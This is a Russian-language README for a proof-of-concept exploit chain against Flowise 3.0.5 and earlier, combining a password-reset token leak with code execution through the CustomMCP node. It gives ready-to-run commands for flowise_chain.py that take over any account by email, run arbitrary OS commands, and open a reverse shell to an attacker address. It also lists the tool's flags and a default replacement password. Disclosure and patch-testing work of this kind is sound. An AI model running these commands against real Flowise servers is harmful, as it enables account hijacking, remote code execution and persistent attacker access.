
CVE-2025-58434 и CVE-2025-59528 chain POC
Эксплойт-цепочка для двух уязвимостей, затрагивающих Flowise <= 3.0.5.
Эндпоинт сброса пароля возвращает действительный токен сброса пароля в ответе API без необходимости аутентификации. Злоумышленник, знающий действительный адрес электронной почты, может сбросить пароль любого аккаунта без взаимодействия с пользователем.
Узел CustomMCP передает управляемые пользователем данные непосредственно конструктору Function() с полными привилегиями Node.js. Авторизованный пользователь с действительным API-ключом может выполнять произвольные команды ОС от имени пользователя процесса Flowise.
Исправлено в: Flowise 3.0.6
pip install requestsПолная цепочка ATO (сбрасывает пароль, запрашивает API-ключ, запускает reverse shell):
python3 flowise_chain.py -t http://target -e [email protected]
Только RCE (если у вас уже есть API-ключ):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
Reverse shell с существующим ключом:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
| Флаг | Описание |
|---|---|
-t, --target | Целевой URL |
-e, --email | Email целевого аккаунта (запускает цепочку ATO) |
--api-key | Указать API-ключ напрямую (пропускает ATO) |
-c, --command | Команда для выполнения |
--lhost | IP атакующего для reverse shell |
--lport | Порт атакующего для reverse shell (по умолчанию: 4444) |
--new-password | Пароль, устанавливаемый при сбросе (по умолчанию: Pwn3d!2026) |
-k, --insecure | Пропустить проверку TLS |
Из-за особенности Flowise 3.0.5 эндпоинт API сброса пароля не сразу обновляет учетные данные, принимаемые эндпоинтом входа. Скрипт делает паузу после сброса и предлагает вам вручную войти в интерфейс и скопировать API-ключ из /apikey.